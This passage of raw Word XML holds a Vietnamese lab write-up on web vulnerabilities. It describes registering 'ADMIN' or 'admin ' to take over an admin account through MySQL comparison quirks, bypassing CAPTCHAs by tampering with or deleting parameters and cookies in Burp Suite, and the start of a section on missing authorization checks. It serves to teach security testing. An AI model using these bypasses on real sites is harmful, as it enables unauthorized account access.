        <w:t>Bí quyết ở đây xuất phát từ thực tế là so sánh khi bạn tạo người dùng được thực hiện theo chương trình (ví dụ: trong Ruby) nhưng khi các chi tiết của người dùng được truy xuất, việc so sánh được thực hiện bởi cơ sở dữ liệu. Theo mặc định, MySQL (với kiểu VARCHAR) sẽ thực hiện so sánh không phân biệt chữ hoa chữ thường: "admin" và "Admin" có cùng giá trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4B9C5" w14:textId="60F4045E" w:rsidR="004653AE" w:rsidRPr="008C14A3" w:rsidRDefault="004653AE" w:rsidP="008C14A3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C14A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sao đó tôi tạo tài khoản có tên như sao: ADMIN và mật khẩu 123.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B7C508" w14:textId="0601AF8F" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0262090B">
          <v:shape id="Hình ảnh 115" o:spid="_x0000_i1146" type="#_x0000_t75" style="width:468pt;height:95.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId136" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="630EB785" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ta nhận được kết quả như mong đợi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A34D92" w14:textId="07D7C0E7" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5249D6F6">
          <v:shape id="Hình ảnh 116" o:spid="_x0000_i1147" type="#_x0000_t75" style="width:384.75pt;height:3in;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId137" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E3B53B" w14:textId="70AE5D90"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Example 6</w:t>
      </w:r>
      <w:r w:rsidR="0090505E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AC4E16" w14:textId="6C483FB1"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Ở ví dụ 6 cũng tương tự ví dụ 5 nhưng ở đây ta tạo tài khoản có tên là admin và cách thêm một khoảng trống ở phía sao admin.</w:t>
      </w:r>
      <w:r w:rsidR="0090505E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0090505E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Khoảng trống ở đây theo ascii định nghĩa nó chính là %20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C5791" w14:textId="4FB09B04" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6E9DD2E6">
          <v:shape id="Hình ảnh 117" o:spid="_x0000_i1148" type="#_x0000_t75" style="width:320.25pt;height:80.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId138" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF841A6" w14:textId="2AC0562C"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Trong bài này, các nhà phát triển đang sử dụng thuật toán phân biệt chữ hoa chữ thường để lọc dữ liệu đã đăng ký trên cơ sở dữ liệu loại bỏ khai thác trước đó, nhưng vì MySQL lọc các khoảng trống lan can và trang đăng ký thì không.</w:t>
      </w:r>
      <w:r w:rsidR="0090505E" w:rsidRPr="0090505E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0090505E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ta được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB4D54" w14:textId="3985FF84" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="140FB456">
          <v:shape id="Hình ảnh 118" o:spid="_x0000_i1149" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId139" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F682192" w14:textId="63F31319" w:rsidR="004653AE" w:rsidRPr="007B34AC" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Kết quả là ta đã tạo thành công account admin dưới quyền quản trị viên của máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DC9184" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000333DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>C.CAPCHA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C746A0" w14:textId="77777777"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 xml:space="preserve">Khi tấn công Captcha và trước khi bắt đầu một số mã hóa khó, hãy đảm bảo rằng không có sai sót logic hoặc một số loại khả năng dự đoán. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED4183" w14:textId="77777777"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Chú ý đến chi tiết là chìa khóa để tìm ra lỗi logic trong hình ảnh xác thực. Đảm bảo bạn kiểm tra mọi chi tiết của phản hồi khi bạn cần bẻ khóa hình ảnh xác thực.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7332E" w14:textId="7B101DFA"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Example 1</w:t>
      </w:r>
      <w:r w:rsidR="0090505E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D733778" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="0090505E" w:rsidRDefault="004653AE" w:rsidP="0090505E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090505E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Đây là một tập lệnh captcha có một lỗ hổng logic, về cơ bản nếu bạn làm cho máy chủ trỏ đến một captcha không hợp lệ thì tập lệnh sẽ không thoát đúng cách, cho phép bạn truy cập mà không cần bất kỳ đầu vào nào. Tổi sử dụng Burpsuite để bắt phiên đăng nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18239C36" w14:textId="5A41AA1A" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="40E6330F">
          <v:shape id="Hình ảnh 119" o:spid="_x0000_i1150" type="#_x0000_t75" style="width:453.75pt;height:207pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId140" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="292C7E23" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tiếp theo tôi xóa capcha đi và thay captcha=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>x.Trên</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burpsuite ta nhấn Forward và xem kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEFD93C" w14:textId="1DF16E14" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="56B94DFB">
          <v:shape id="Hình ảnh 120" o:spid="_x0000_i1151" type="#_x0000_t75" style="width:468pt;height:200.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId141" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6DA870" w14:textId="009B0EE4" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="191CD16F">
          <v:shape id="Hình ảnh 121" o:spid="_x0000_i1152" type="#_x0000_t75" style="width:333pt;height:186pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId142" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE3C221" w14:textId="2BCF61F4" w:rsidR="004653AE" w:rsidRPr="007B34AC" w:rsidRDefault="004653AE" w:rsidP="007B34AC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B34AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 2</w:t>
      </w:r>
      <w:r w:rsidR="007B34AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ABAD75" w14:textId="747A603E" w:rsidR="00ED2A02" w:rsidRDefault="004653AE" w:rsidP="00ED2A02">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B34AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trong phần ví dú 2 cũng khá tương tự ví dụ 1.Ở đây ta có thể sử dụng một đoạn code python để vượt qua captcha hoặc sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00ED2A02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED2A02" w:rsidRPr="007B34AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00ED2A02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D8676E" w14:textId="54323A68" w:rsidR="004653AE" w:rsidRPr="00ED2A02" w:rsidRDefault="00283404" w:rsidP="00272978">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="30272A38">
          <v:shape id="Hình ảnh 123" o:spid="_x0000_i1153" type="#_x0000_t75" style="width:383.25pt;height:3in;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" o:allowoverlap="f">
            <v:imagedata r:id="rId143" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0304B81D" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Tôi đặt cho mã code trên có tên là captcha2.py.Sau đó mở command Power Shell trên </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>window,thực</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> thi câu lệnh python captcha2.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6717D925" w14:textId="6F8847E4" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7847A4C0">
          <v:shape id="Hình ảnh 124" o:spid="_x0000_i1154" type="#_x0000_t75" style="width:468pt;height:75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId144" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F24B85" w14:textId="798C5765" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0E234149">
          <v:shape id="Hình ảnh 125" o:spid="_x0000_i1155" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId145" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2247E717" w14:textId="77777777"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Example 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B79128E" w14:textId="77777777"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Ở ví dụ 3 ta sẽ khai thác captcha bằng cách xóa đi phiên đăng nhập của nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC9AA14" w14:textId="77777777"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Đầu tiên ta sử dụng Cookie-Editor để kiểm tra cookie hoặc F12 trên firefox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E889A" w14:textId="25F78C43"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Sau đó vào Console kiểm tra cookie của captcha.</w:t>
      </w:r>
      <w:r w:rsidR="00272978">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00272978">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau đó tiến hành xóa đi đoạn cookie này hoặcxóa giá </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00272978">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trị(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00272978">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Values) trên tiên ích Cookie-Editor đa được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B2C6D" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79841913" w14:textId="5B8B7230" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="00272978">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4CD5C891">
          <v:shape id="Hình ảnh 126" o:spid="_x0000_i1156" type="#_x0000_t75" style="width:427.5pt;height:226.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId146" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC2F90B" w14:textId="4D2390E7" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="00272978">
      <w:pPr>
        <w:pStyle w:val="simple-translate-result"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="72524621">
          <v:shape id="Hình ảnh 127" o:spid="_x0000_i1157" type="#_x0000_t75" style="width:420.75pt;height:236.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId147" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D900AC" w14:textId="687AD5EB"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Example 4</w:t>
      </w:r>
      <w:r w:rsidR="00272978">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFBB2FB" w14:textId="77777777"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Ở phần ví dụ 4 do lỗi của nhà phát triển nên 1 captcha bạn có thể dùng để xác thực rất nhiều lần.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0E219F" w14:textId="2E5849C2" w:rsidR="004653AE" w:rsidRPr="00272978" w:rsidRDefault="004653AE" w:rsidP="00272978">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272978">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lợi dụng lỗ hổng này tôi tiến hành sử dụng Burpsuite và dùng một captcha khác.</w:t>
      </w:r>
      <w:r w:rsidR="007144A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00272978">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sau đó tôi gửi toàn bộ session sang Repeater và nhấn Go.</w:t>
      </w:r>
      <w:r w:rsidR="007144A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00272978">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2CB3D2" w14:textId="3C0D246D" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7B276BC5">
          <v:shape id="Hình ảnh 128" o:spid="_x0000_i1158" type="#_x0000_t75" style="width:420.75pt;height:236.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId148" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB37B5" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00431F40" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00431F40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>D.Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35951257" w14:textId="00A24556" w:rsidR="004653AE" w:rsidRPr="00AA6E44" w:rsidRDefault="004653AE" w:rsidP="00AA6E44">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vấn đề ủy quyền rất phổ biến trong các ứng dụng web. Phần này tập hợp một số ví dụ phổ biến về tính dễ bị tổn thương. Các khuôn khổ phát triển web hiện đại thường bảo vệ khỏi tất cả các loại xâm nhập nhưng không thể tự động xử lý các loại vấn đề này một cách tự động, vì chúng không thể hiểu được logic đằng sau chúng. Các vấn đề về ủy quyền thực sự không thể được kiểm tra bằng máy quét web tự động vì lý do tương tự, đó là lý do tại sao nó thường là một nguồn tốt của các lỗ hổng và điều quan trọng là phải biết cách kiểm tra chúng.</w:t>
      </w:r>
      <w:r w:rsidR="00AA6E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ta cùng tìm hiểu một số ví dụ sau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED698D" w14:textId="06B42802" w:rsidR="004653AE" w:rsidRPr="00AA6E44" w:rsidRDefault="004653AE" w:rsidP="00AA6E44">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 1</w:t>
      </w:r>
      <w:r w:rsidR="00F51666">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F706CF" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00AA6E44" w:rsidRDefault="004653AE" w:rsidP="00AA6E44">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Đây là một lỗ hổng phổ biến trong phát triển web, nhà phát triển đã tạo trang đăng nhập nhưng không khóa các trang có thông tin nhạy cảm thông qua cookie hoặc mã thông báo bảo mật, điều này có nghĩa là bạn có thể truy cập thông tin thiên đường nếu không. đăng nhập ở tất cả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD2312" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00AA6E44" w:rsidRDefault="004653AE" w:rsidP="00AA6E44">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Đầu tiên ta đăng nhập với user và password đã cho sẵn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C72449" w14:textId="6BDE0D68" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004E2AC2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="457B8CBD">
          <v:shape id="Hình ảnh 129" o:spid="_x0000_i1159" type="#_x0000_t75" style="width:430.5pt;height:242.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId149" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C7C794" w14:textId="40B53A4E" w:rsidR="004653AE" w:rsidRPr="00891442" w:rsidRDefault="004653AE" w:rsidP="00891442">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
